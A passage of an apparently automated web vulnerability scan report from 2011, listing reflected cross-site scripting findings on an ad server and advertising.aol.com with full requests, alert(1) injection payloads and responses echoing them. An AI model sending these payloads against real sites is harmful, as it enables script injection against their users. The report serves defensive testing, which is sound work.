GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d'%3balert(1)//f39440116ba HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4241
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423833; expires=Sun, 18-Sep-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=57&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:34 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=33c3d';alert(1)//f39440116bahttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594';var fd_wdt=728;var fd_hgt=90;document.writeln("
...[SNIP]...

4.42. http://adsfac.us/ag.asp [clk parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6104"><script>alert(1)</script>3966686c35b was submitted in the clk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35b HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4271
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002315724=uid=17423629; expires=Sun, 18-Sep-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: FSETN002=pctl=315724&pctm=55&FL315724=12&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=12&pctc=39594&FQ=12; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=98310839266265250e8c376c5f1b330f262bd69; expires=Mon, 17-Oct-2011 16:38:32 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

<html><head></head><body><script type="text/javascript">var fd_imp='http://adsfac.us/creative.asp?CreativeID=39594';var fd_clk='http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sd
...[SNIP]...
<a target="_blank" href="http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl=c6104"><script>alert(1)</script>3966686c35bhttp://adsfac.us/link.asp?cc=ETN002.315724.0&CreativeID=39594">
...[SNIP]...

4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a11bc"-alert(1)-"b393fe7193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a11bc"-alert(1)-"b393fe7193b/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a11bc"-alert(1)-"b393fe7193b/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79aaf"><script>alert(1)</script>0cb01a4ae72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/79aaf"><script>alert(1)</script>0cb01a4ae72/0/4/1/" />
...[SNIP]...

4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff5d"><script>alert(1)</script>de78e1ca44a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bff5d"><script>alert(1)</script>de78e1ca44a/1/4/1/" />
...[SNIP]...

4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b02af"-alert(1)-"4c30a13b2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b02af"-alert(1)-"4c30a13b2ad/1/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:30:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:30:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b02af"-alert(1)-"4c30a13b2ad/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36906"><script>alert(1)</script>d283a00d3ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /36906"><script>alert(1)</script>d283a00d3ed/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/36906"><script>alert(1)</script>d283a00d3ed/2/4/1/" />
...[SNIP]...

4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c7f"-alert(1)-"eb2f998d238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b1c7f"-alert(1)-"eb2f998d238/2/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b1c7f"-alert(1)-"eb2f998d238/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b801f"><script>alert(1)</script>acc8dbf6e06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b801f"><script>alert(1)</script>acc8dbf6e06/3/4/1/" />
...[SNIP]...

4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/3/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e341"-alert(1)-"e57ac4cfe09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /1e341"-alert(1)-"e57ac4cfe09/3/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:29:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:29:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/1e341"-alert(1)-"e57ac4cfe09/3/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a144a"-alert(1)-"ae544fdf52a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a144a"-alert(1)-"ae544fdf52a/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:28:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:28:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a144a"-alert(1)-"ae544fdf52a/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbabf"><script>alert(1)</script>320792b55e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bbabf"><script>alert(1)</script>320792b55e6/4/4/1/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
